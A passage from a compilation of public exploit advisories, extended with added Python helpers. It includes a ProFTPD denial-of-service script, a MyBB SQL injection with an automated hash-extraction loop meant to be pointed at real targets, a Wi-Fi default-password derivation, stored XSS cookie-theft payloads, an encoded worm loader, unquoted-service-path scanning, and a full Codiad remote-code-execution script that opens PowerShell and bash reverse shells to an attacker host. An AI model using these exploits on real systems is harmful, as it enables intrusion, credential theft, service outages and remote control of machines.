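    first stage is kept ASCII so each ord() is one UTF-16 code unit, which is what
    String.fromCharCode consumes.
    """
    if not js.isascii():
        raise ValueError("keep the first-stage JavaScript ASCII")
    return "eval(String.fromCharCode(%s))" % ",".join(str(ord(c)) for c in js)


def mycode_vector(second_stage_url):
    """The complete MyCode payload of step 4 for a given second-stage script URL."""
    return VECTOR % fromcharcode_encode(LOADER % second_stage_url)


def decode_fromcharcode(text):
    """Inverse, for triage: every String.fromCharCode(...) literal in `text`, decoded."""
    decoded = []
    for match in _FCC.finditer(text):
        codes = [int(n) for n in match.group(1).replace(" ", "").split(",") if n]
        decoded.append("".join(chr(n) for n in codes))
    return decoded


if __name__ == "__main__":
    vector = mycode_vector("http://localhost:8000/worm.js")
    print(vector)
    print(decode_fromcharcode(vector))
```

With `http://localhost:8000/worm.js` as the URL the output is byte-for-byte the step-4 payload shown in the post, which is a quick way to confirm an encoder before sending anything.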
  7. # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm
     # Date: 03.02.2021
     # Exploit Author: LiquidWorm
     # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

     Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
     Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                       http://www.jatontec.com/products/show.php?itemid=258
                       http://www.jatontech.com/CAT12.html#_pp=105_564
                       http://www.kzbtech.com/AM3300V.html
                       https://neotel.mk/ostanati-paketi-2/

     Affected version:

       Model    | Firmware
       ---------|-----------
       JT3500V  | 2.0.1B1064
       JT3300V  | 2.0.1B1047
       AM6200M  | 2.0.0B3210
       AM6000N  | 2.0.0B3042
       AM5000W  | 2.0.0B3037
       AM4200M  | 2.0.0B2996
       AM4100V  | 2.0.0B2988
       AM3500MW | 2.0.0B1092
       AM3410V  | 2.0.0B1085
       AM3300V  | 2.0.0B1060
       AM3100E  | 2.0.0B981
       AM3100V  | 2.0.0B946
       AM3000M  | 2.0.0B21
       KZ7621U  | 2.0.0B14
       KZ3220M  | 2.0.0B04
       KZ3120R  | 2.0.0B01

     Summary: JT3500V is the most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service.

     Desc: The device generates its SSID and password based on the WAN MAC address.

     Tested on: GoAhead-Webs/2.5.0
                PeerSec-MatrixSSL/3.1.3-OPEN
                Linux 2.6.36+ (mips)
                Mediatek APSoC SDK v4.3.1.0

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience

     Advisory ID: ZSL-2021-5638
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5638.php

     03.02.2021

     --

     Example defaults:

     # ifconfig |grep HWaddr
     br0        Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
     br0:9      Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
     eth2       Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
     eth2.1     Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
     eth2.100   Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
     eth2.1000  Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
     eth2.2     Link encap:Ethernet  HWaddr 6C:AD:EF:FF:00:01
     ra0        Link encap:Ethernet  HWaddr 6C:AD:EF:5D:7C:5C
     rai0       Link encap:Ethernet  HWaddr 6C:AD:EF:5E:7C:5C

     SSID1=MyWiFi-167C5D
     SSID1=MyWiFi-5G-167C5D

     WiFi password = EF167C5D
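The advisory's example shows the whole scheme: the SSID suffix `167C5D` is the last three octets of the WAN MAC `6C:AD:EF:16:7C:5D`, and the password `EF167C5D` is the last four. The Python below is an added example, not ZSL's code, that reproduces the derivation and shows what it costs an attacker who only sees the beacon: the SSID already leaks three of the four password octets, and the fourth is the last octet of the vendor OUI. The `MyWiFi-` prefixes, the octet positions and the `6C:AD:EF` OUI are taken from the advisory's output above; treating that OUI as the only one the family uses is an assumption, so the function also offers the 256-guess fallback for an unknown OUI.

```python
"""Default Wi-Fi credential derivation for the JT3500V family (added example, not the vendor's code)."""
import re


def _hex_octets(value, count):
    """Strip separators from a MAC or OUI and return `count` octets as upper-case hex."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", value).upper()
    if len(digits) != count * 2:
        raise ValueError("expected %d octets, got %r" % (count, value))
    return digits


def default_credentials(wan_mac):
    """SSIDs carry the last three octets of the WAN MAC, the password the last four."""
    mac = _hex_octets(wan_mac, 6)
    return {
        "ssid_2g": "MyWiFi-" + mac[-6:],
        "ssid_5g": "MyWiFi-5G-" + mac[-6:],
        "password": mac[-8:],
    }


def passwords_from_ssid(ssid, known_ouis=("6C:AD:EF",)):
    """Candidate passwords recoverable from a beacon alone.

    The SSID suffix is the low three octets of the password.  The missing high octet
    is the last octet of the OUI, so with the vendor OUI(s) known (6C:AD:EF is the one
    in the advisory; assumed here to be representative) the password is determined
    outright.  With no OUI known the space is just the 256 possible values of that octet.
    """
    match = re.fullmatch(r"MyWiFi-(?:5G-)?([0-9A-F]{6})", ssid)
    if not match:
        return []
    tail = match.group(1)
    if known_ouis:
        return [_hex_octets(oui, 3)[-2:] + tail for oui in known_ouis]
    return ["%02X%s" % (octet, tail) for octet in range(256)]


if __name__ == "__main__":
    print(default_credentials("6C:AD:EF:16:7C:5D"))   # the advisory's own example MAC
    print(passwords_from_ssid("MyWiFi-5G-167C5D"))
    print(len(passwords_from_ssid("MyWiFi-167C5D", known_ouis=())))
```

Feeding the advisory's MAC returns exactly the SSIDs and password it lists, and the 5 GHz SSID alone yields the single candidate `EF167C5D`.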
  8. # Exploit Title: ProFTPD 1.3.7a - Remote Denial of Service
     # Date: 22/03/2021
     # Exploit Author: xynmaps
     # Vendor Homepage: http://www.proftpd.org/
     # Software Link: https://github.com/proftpd/proftpd
     # Version: 1.3.7a
     # Tested on: Parrot Security OS 5.9.0
     #-------------------------------#

     #!/usr/bin/env python3
     # -*- coding: utf-8 -*-
     # __author__ = XYN/Dump/NSKB3
     # ProFTPD Denial of Service exploit by XYN/Dump/NSKB3.
     """
     ProFTPD only lets a certain amount of connections be made to the server, so, by
     repeatedly making new connections to the server, you can block other legitimate
     users from making a connection to the server, if the connections/ip isn't limited.
     (if it's limited, just run this script from different proxies using proxychains,
     and it will work)
     """
     import socket
     import subprocess
     import sys
     import threading
     import time

     banner = """
      ._________________.
      |     ProFTPD     |
      |      D o S      |
      |_________________|
      |By XYN/DUMP/NSKB3|
      |_|_____________|_|
      |_|_|_|_____|_|_|_|
      |_|_|_|_|_|_|_|_|_|
     """

     usage = "{} <TARGET> <PORT(DEFAULT:21)> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])

     # Popen handles are kept here so the ftp clients' stdin pipes stay open (a dropped
     # handle closes the pipe and the client exits on EOF, freeing the slot again).
     clients = []


     def test(t, p):
         # Make sure the port answers before spawning clients
         s = socket.socket()
         s.settimeout(10)
         try:
             s.connect((t, p))
             s.recv(65535)
             s.close()
             return 0
         except socket.error:
             print("Port {} is not open, please specify a port that is open.".format(p))
             sys.exit()


     def attack(targ, po, id):
         # Each worker holds one ftp client open; it just sits at the login prompt occupying a slot
         try:
             clients.append(subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True,
                                             stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                                             stderr=subprocess.PIPE))
             # print("Worker {} running".format(id))
         except OSError:
             pass


     def loop(target, port, conns):
         # Open a batch of connections, hold them for 15 minutes, then kill the clients
         # and open a fresh batch so the slots never free up for long.
         while 1:
             start = time.time()
             for i in range(1, conns + 1):
                 threading.Thread(target=attack, args=(target, port, i)).start()
             while time.time() - start < 900.0:
                 time.sleep(1)
             subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
             del clients[:]


     def main():
         print(banner)
         try:
             target = sys.argv[1]
         except IndexError:
             print(usage)
             sys.exit()
         try:
             port = int(sys.argv[2])
         except (IndexError, ValueError):
             port = 21
         try:
             conns = int(sys.argv[3])
         except (IndexError, ValueError):
             conns = 50
         print("[!] Testing if {0}:{1} is open".format(target, port))
         test(target, port)
         print("[+] Port {} open, starting attack...".format(port))
         time.sleep(2)
         print("[+] Attack started on {0}:{1}!".format(target, port))
         threading.Thread(target=loop, args=(target, port, conns)).start()


     main()
9. # Exploit Title: OSAS Traverse Extension 11 - 'travextensionhostsvc' Unquoted Service Path
# Exploit Auth: Tech Johnny
# Vendor Homepage: https://www.osas.com
# Version: 11 x86
# Tested on: Windows 2012R2

Details:

C:\Windows\system32>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
TRAVERSE Automation Service  TravExtensionHostSvc  C:\Program Files\Open Systems, Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe  Auto

C:\Windows\system32>sc.exe qc travextensionhostsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: travextensionhostsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Open Systems,Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : TRAVERSE Automation Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
10. # Exploit Title: MyBB 1.8.25 - Poll Vote Count SQL Injection
# Exploit Author: SivertPL ([email protected])
# Date: 20.03.2021
# Description: Lack of sanitization in the "votes[]" parameter in "Edit Poll" causes a second-order semi-blind SQL Injection that is triggered when performing a "Move/Copy" operation on the thread.
# Software Link: https://resources.mybb.com/downloads/mybb_1825.zip
# CVE: CVE-2021-27946

References:
1) https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums
2) https://vuldb.com/?id.171307
3) https://github.com/mybb/mybb/commit/aa415f08bce01f95a8319b707bb18eb67833f4c1.patch

In order to trigger the vulnerability, you must have permission to edit polls. Moderators and administrators can usually do it, but in some configurations regular users can do it as well.

In case you are a moderator, the vulnerability can be used as privilege escalation provided you crack the resulting salted hash. Otherwise, you are free to use CVE-2021-27889 to impersonate the target moderator to trigger this SQL Injection from an external .js script which will perform the necessary injections automatically, and send the resulting hashes to your server.

This is a pretty nasty vulnerability to exploit by hand (at least on the regular, most common MySQL setup), but it can be dangerous in the hands of a very determined attacker who combines it with CVE-2021-27889 and an automated JavaScript-based SQL injector.

This vulnerability might however allow for devastating execution of stacked queries when databases such as PostgreSQL or MS-SQL are used. In such cases, the entire system is compromised as a result (an attacker can UPDATE the admin password and replace it with his own hash).

Guide:
1) Make a thread with a public poll, with multiple choices.
2) Vote on at least one choice.
3) Go to the "Edit poll" section of the poll.
4) Place the following payload in the "vote count" input (any entry within the votes[] parameter in the resulting POST request).

1','2',ascii((select version())),'0','0','1','1') -- -a

5) Save the poll.
6) Perform a "Move/Copy" operation on the thread, moving it to a different forum, or making a copy in the same forum. This is where the SQL Injection is triggered, and you should see an SQL error here if the payload is incorrect.
7) Go to the copied/moved version of the thread (you should be redirected there automatically).
8) Go to the "Show Results" section of the poll.
9) The total vote count under the poll is our 64-bit unsigned integer covert channel to retrieve information from the ascii select query. Since this vulnerability is semi-blind, you can only retrieve the output of the SELECT query as an unsigned integer (hence we use ASCII()). Other parameters in the INSERT query that we are injecting into are either too small, or unfeasible. An unsigned integer provides enough space to extract the required data when enough requests are made.

In this case, the number is the ASCII code of the first character of the result of the injected select version() query. This way we can transfer the output through this covert channel, one character at a time.

In order to extract the admin hash, one has to either perform many requests (so it's best to automate it), or find a better way to convert a substring varchar to int.

1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 2, 1))),'0','0','1','1') -- -a
1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 3, 1))),'0','0','1','1') -- -a
1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 4, 1))),'0','0','1','1') -- -a
1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 5, 1))),'0','0','1','1') -- -a
... etc.

This will send the ASCII codes of every char of the hashed password through the integer covert channel.

10) After sending enough requests, you should have the hashed admin password. Repeat the entire process to acquire the salt.
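The per-character loop in step 9 is the part worth automating. The following is an added example, not code from the advisory or from MyBB: it builds the same `votes[]` payload for each character position and reads one ASCII code per round trip until `ASCII('')` (0) marks the end of the string. The real round trip (edit poll, move/copy, read "Show Results") needs an authenticated session, so it is abstracted as an `oracle` callback; the `simulated_oracle` and the `FAKE_USERS` table behind it are constructed here so the script runs offline, and the hash and salt values in it are made up.

```python
import re
from typing import Callable, Dict, List


def build_payload(column: str, table: str, username: str, position: int) -> str:
    """Return the advisory's votes[] payload for one character of the selected column.

    The ASCII code of character `position` (1-based, as in MySQL SUBSTRING) ends up
    as the poll's total vote count after the Move/Copy operation."""
    return (
        "1','2',ascii((substring((SELECT {col} FROM {tbl} WHERE username=\"{user}\"), {pos}, 1))),"
        "'0','0','1','1') -- -a"
    ).format(col=column, tbl=table, user=username, pos=position)


def extract_value(oracle: Callable[[str], int], column: str, table: str,
                  username: str, max_len: int = 128) -> str:
    """Read a column value one character per request through the integer covert channel.

    `oracle(payload)` must return the total vote count shown under the poll after the
    payload has been saved and the thread moved or copied. ASCII() of an empty
    SUBSTRING is 0, which tells us the string has ended."""
    chars: List[str] = []
    for pos in range(1, max_len + 1):
        code = oracle(build_payload(column, table, username, pos))
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars)


# Constructed stand-in for the mybb_users table (values are invented, not real hashes).
FAKE_USERS: Dict[str, Dict[str, str]] = {
    "sivertpl": {"password": "5f4dcc3b5aa765d61d8327deb882cf99", "salt": "a1B2c3D4"},
}

_PAYLOAD_RE = re.compile(r'SELECT (\w+) FROM (\w+) WHERE username="([^"]+)"\), (\d+), 1')


def simulated_oracle(payload: str) -> int:
    """Offline model of the edit-poll / move-copy / show-results round trip.

    Parses the injected SELECT and evaluates ascii(substring(value, pos, 1)) the way
    MySQL would, including the 0 returned once pos runs past the end of the value."""
    m = _PAYLOAD_RE.search(payload)
    if not m:
        raise ValueError("payload does not contain the expected SELECT")
    col, _tbl, user, pos = m.group(1), m.group(2), m.group(3), int(m.group(4))
    value = FAKE_USERS.get(user, {}).get(col, "")
    return ord(value[pos - 1]) if pos <= len(value) else 0


if __name__ == "__main__":
    for col in ("password", "salt"):
        print(col, "=", extract_value(simulated_oracle, col, "mybb_users", "sivertpl"))
```

To use it against a real target, replace `simulated_oracle` with a function that performs the three HTTP steps with the moderator's session and parses the vote count out of the results page; the payload builder and the extraction loop do not change.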
11. # Exploit Title: Hotel And Lodge Management System 1.0 - 'Customer Details' Stored XSS
# Exploit Author: Jitendra Kumar Tripathi
# Vendor Homepage: https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13707&title=Hotel+and+Lodge+Management+System+using+PHP+with+Source+Code
# Version: 1
# Tested on Windows 10 + Xampp 8.0.3

XSS IMPACT:
1: Steal the cookie
2: User redirection to a malicious website

Vulnerable Parameters: Customer Details

*Steps to reproduce:*
1: Log in with a valid username and password. Navigate to the Customer Details (http://localhost/hotel/source%20code/index.php) on the left-hand side.
2: Add a new customer, put the payload <script>alert(document.cookie)</script> in the Customer Name parameter and click on the save button. Post saved successfully.
3: Now the XSS is stored and triggers every time you click view customer, and the attacker can steal authenticated users' cookies.
12. # Exploit Title: Hi-Rez Studios 5.1.6.3 - 'HiPatchService' Unquoted Service Path
# Discovery by: Ekrem Can Kök
# Discovery Date: 2021-03-22
# Vendor Homepage: https://www.hirezstudios.com
# Version: 5.1.6.3
# Tested on: Windows 10 Pro x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\" | findstr /i "HiPatchService" | findstr /i /v """
Hi-Rez Studios Authenticate and Update Service  HiPatchService  C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe  Auto

# Service info:

C:\>sc qc "HiPatchService"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: HiPatchService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Hi-Rez Studios Authenticate and Update Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:
This vulnerability could permit executing code during startup or reboot with escalated privileges.
13. # Exploit Title: ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path
# Exploit Author : SamAlucard
# Exploit Date: 2021-03-22
# Vendor : ELAN Microelectronics
# Version : ELAN Touchpad 15.2.13.1_X64_WHQL
# Vendor Homepage : http://www.emc.com.tw/
# Tested on OS: Windows 8
# This software installs ETDService.exe, version 11.10.2.1

# Analyze PoC :
==============

C:\>sc qc ETDService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ETDService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Elantech\ETDService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Elan Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
14. # Exploit Title: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path
# Exploit Author : SamAlucard
# Exploit Date: 2021-03-21
# Software Version : ActivIdentity 8.2
# Vendor Homepage : https://www.hidglobal.com/
# Tested on OS: Windows 7 Pro
# ActivIdentity was acquired by HID Global in October 2010
# ActivClient is desktop authentication software that uses smart cards and readers
# for enterprise, government and commercial establishments

# Analyze PoC :
==============

C:\Users\DSAdsi>sc qc ac.sharedstore
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ac.sharedstore
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
        LOAD_ORDER_GROUP   : SmartCardGroup
        TAG                : 0
        DISPLAY_NAME       : ActivIdentity Shared Store Service
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem
15. # Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated)
# Discovery by: WangYihang
# Vendor Homepage: http://codiad.com/
# Software Links : https://github.com/Codiad/Codiad/releases
# Tested Version: Version: 2.8.4
# CVE: CVE-2018-14009

#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import json
import base64

session = requests.Session()


def login(domain, username, password):
    global session
    url = domain + "/components/user/controller.php?action=authenticate"
    data = {
        "username": username,
        "password": password,
        "theme": "default",
        "language": "en"
    }
    response = session.post(url, data=data, verify=False)
    content = response.text
    print("[+] Login Content : %s" % (content))
    if 'status":"success"' in content:
        return True
    return False


def get_write_able_path(domain):
    global session
    url = domain + "/components/project/controller.php?action=get_current"
    response = session.get(url, verify=False)
    content = response.text
    print("[+] Path Content : %s" % (content))
    json_obj = json.loads(content)
    if json_obj['status'] == "success":
        return json_obj['data']['path']
    else:
        return False


def base64_encode_2_bytes(host, port):
    # powershell -enc expects UTF-16LE, hence the NUL byte after every character
    payload = '''
$client = New-Object System.Net.Sockets.TCPClient("__HOST__",__PORT__);
$stream = $client.GetStream();
[byte[]]$bytes = 0..255|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush();
}
$client.Close();
'''
    result = ""
    for i in payload.replace("__HOST__", host).replace("__PORT__", str(port)):
        result += i + "\x00"
    return base64.b64encode(result.encode()).decode().replace("\n", "")


def build_powershell_payload(host, port):
    preffix = "powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc "
    return preffix + base64_encode_2_bytes(host, port).replace("+", "%2b")


def exploit(domain, username, password, host, port, path, platform):
    global session
    url = domain + \
        "components/filemanager/controller.php?type=1&action=search&path=%s" % (path)
    headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
    if platform.lower().startswith("win"):
        # new version escapeshellarg
        # escapeshellarg on windows will quote the arg with ""
        # so we need to try twice
        payload = '||%s||' % (build_powershell_payload(host, port))
        payload = "search_string=Hacker&search_file_type=" + payload
        response = session.post(url, data=payload, headers=headers, verify=False)
        content = response.text
        print(content)
        # old version escapeshellarg
        payload = '%%22||%s||' % (build_powershell_payload(host, port))
        payload = "search_string=Hacker&search_file_type=" + payload
        response = session.post(url, data=payload, headers=headers, verify=False)
        content = response.text
        print(content)
    else:
        # payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F''' + host + '''%2F''' + port + '''+0%3E%261'%0Agrep+%22SniperOJ'''
        payload = '"%%0Anc %s %d|/bin/bash %%23' % (host, port)
        payload = "search_string=Hacker&search_file_type=" + payload
        response = session.post(url, data=payload, headers=headers, verify=False)
        content = response.text
        print(content)


def promote_yes(hint):
    print(hint)
    while True:
        ans = input("[Y/n] ").lower()
        if ans == 'n':
            return False
        elif ans == 'y':
            return True
        else:
            print("Incorrect input")


def main():
    if len(sys.argv) != 7:
        print("Usage : ")
        print("    python %s [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]" % (sys.argv[0]))
        print("    python %s [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]" % (sys.argv[0]))
        print("Example : ")
        print("    python %s http://localhost/ admin admin 8.8.8.8 8888 linux" % (sys.argv[0]))
        print("    python %s http://localhost:8080/ admin admin 8.8.8.8 8888 windows" % (sys.argv[0]))
        print("Author : ")
        print("    WangYihang <[email protected]>")
        sys.exit(1)
    domain = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    host = sys.argv[4]
    port = int(sys.argv[5])
    platform = sys.argv[6]
    if platform.lower().startswith("win"):
        print("[+] Please execute the following command on your vps: ")
        print("nc -lnvp %d" % (port))
        if not promote_yes("[+] Please confirm that you have done the command above [y/n]"):
            sys.exit(1)
    else:
        print("[+] Please execute the following command on your vps: ")
        print("echo 'bash -c \"bash -i >/dev/tcp/%s/%d 0>&1 2>&1\"' | nc -lnvp %d" % (host, port + 1, port))
        print("nc -lnvp %d" % (port + 1))
        if not promote_yes("[+] Please confirm that you have done the two commands above [y/n]"):
            sys.exit(1)
    print("[+] Starting...")
    if not login(domain, username, password):
        print("[-] Login failed! Please check your username and password.")
        sys.exit(2)
    print("[+] Login success!")
    print("[+] Getting writeable path...")
    path = get_write_able_path(domain)
    if path == False:
        print("[+] Get current path error!")
        sys.exit(3)
    print("[+] Writeable Path : %s" % (path))
    print("[+] Sending payload...")
    exploit(domain, username, password, host, port, path, platform)
    print("[+] Exploit finished!")
    print("[+] Enjoy your reverse shell!")


if __name__ == "__main__":
    main()
16. # Exploit Title: Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path
# Discovery by: Alan Mondragon
# Discovery Date: 2021-03-23
# Vendor Homepage: https://eventlogxp.com/
# Software Links : https://eventlogxp.com/
# Tested Version: Version: 4.9.3
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro 64 bits

# Step to discover Unquoted Service Path:

C:\WINDOWS\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Elodea Event Collector Service  ElodeaEventCollectorService  C:\Program Files (x86)\Elodea\EventCollector.exe  Auto

C:\WINDOWS\system32>sc qc "ElodeaEventCollectorService"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ElodeaEventCollectorService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Elodea\EventCollector.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Elodea Event Collector Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications, where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
17. # Exploit Title: Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path
# Date: 2021-1-19
# Exploit Author: Mohammed Alshehri
# Software Link: https://sourceforge.net/projects/ext2fsd/files/latest/download
# Version: 0.68
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Service info:

C:\Users\m507>sc qc Ext2Srv
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Ext2Srv
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Ext2Fsd\Ext2Srv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Ext2 Management Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

# Exploit:
This vulnerability could permit executing code during startup or reboot with escalated privileges.
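Items 9, 12, 13, 14, 16 and 17 all rest on the same check: an auto-start service running as LocalSystem whose unquoted `BINARY_PATH_NAME` contains spaces, so that CreateProcess tries `C:\Program.exe`, `C:\Program Files\Vendor.exe` and so on before the real binary. The following is an added example, not code from any of those advisories: a parser for the `wmic service get name, displayname, pathname, startmode` table they all start from, which applies the same filters as the `findstr` chain (auto-start, not under `C:\Windows`, not already quoted) and lists the hijack candidates an attacker would need write access to. The `SAMPLE_WMIC` text is constructed from the paths quoted in those items plus two control rows; on a real host, pipe `wmic`'s output into `parse_wmic` instead.

```python
import re
from typing import List, NamedTuple, Tuple


class Service(NamedTuple):
    name: str
    path: str
    startmode: str


# Constructed sample in the column order wmic prints for this query
# (DisplayName, Name, PathName, StartMode). Paths taken from the advisories above;
# the wuauserv and QuotedSvc rows are controls that must not be flagged.
SAMPLE_WMIC = r"""
DisplayName                                     Name                PathName                                                         StartMode
Hi-Rez Studios Authenticate and Update Service  HiPatchService      C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe         Auto
Ext2 Management Service                         Ext2Srv             C:\Program Files\Ext2Fsd\Ext2Srv.exe                             Auto
Windows Update                                  wuauserv            C:\Windows\system32\svchost.exe -k netsvcs                       Auto
Quoted Vendor Service                           QuotedSvc           "C:\Program Files\Vendor\Quoted Service.exe" -run                Auto
"""

# DisplayName may contain single spaces, so the column break is two or more spaces;
# Name is one token; StartMode is the last token on the line.
_ROW_RE = re.compile(
    r"^(?P<display>.*?)\s{2,}(?P<name>\S+)\s+(?P<path>\S.*?)\s+(?P<mode>Auto|Manual|Disabled|Boot|System)\s*$"
)


def parse_wmic(text: str) -> List[Service]:
    """Turn the wmic table into Service records, skipping the header and blank lines."""
    services = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("DisplayName"):
            continue
        m = _ROW_RE.match(line)
        if m:
            services.append(Service(m.group("name"), m.group("path").strip(), m.group("mode")))
    return services


def executable_of(path: str) -> str:
    """Strip service arguments: keep everything up to the first '.exe' token."""
    m = re.match(r"^(.*?\.exe)(?=\s|$)", path, re.IGNORECASE)
    return m.group(1) if m else path


def hijack_candidates(exe: str) -> List[str]:
    """Paths CreateProcess tries before the real binary when the path is unquoted:
    each prefix that ends at a space, with .exe appended."""
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def find_unquoted(services: List[Service]) -> List[Tuple[str, str, List[str]]]:
    """Apply the advisories' filters and return (name, executable, candidates) per finding."""
    findings = []
    for svc in services:
        if svc.startmode.lower() != "auto":
            continue
        if svc.path.startswith('"'):          # already quoted: not exploitable this way
            continue
        exe = executable_of(svc.path)
        if exe.lower().startswith(r"c:\windows"):  # mirrors findstr /v "C:\Windows\\"
            continue
        if " " in exe:
            findings.append((svc.name, exe, hijack_candidates(exe)))
    return findings


if __name__ == "__main__":
    for name, exe, candidates in find_unquoted(parse_wmic(SAMPLE_WMIC)):
        print(f"{name}: {exe}")
        for c in candidates:
            print(f"    would load first if writable: {c}")
```

Whether a candidate is actually exploitable depends on whether a low-privileged user can create that file, which this script does not check; on the host, test each candidate's parent directory with `icacls` before claiming privilege escalation.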
18. # Exploit Title: Linksys EA7500 2.0.8.194281 - Cross-Site Scripting
# Date: 3/24/21
# Exploit Author: MiningOmerta
# Vendor Homepage: https://www.linksys.com/
# Version: EA7500 Firmware Version: 2.0.8.194281
# CVE: CVE-2012-6708
# Tested On: Linksys EA7500 (jQuery version 1.7.1)

# Cross-Site Scripting Vulnerability on modern versions of Linksys Smart-Wifi home routers.
